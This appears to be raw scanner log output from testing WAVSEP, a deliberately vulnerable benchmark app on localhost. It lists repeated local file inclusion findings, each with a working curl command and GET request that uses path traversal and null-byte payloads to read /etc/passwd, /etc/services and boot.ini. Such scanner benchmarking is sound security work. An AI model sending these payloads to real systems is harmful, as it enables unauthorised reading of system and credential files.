curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
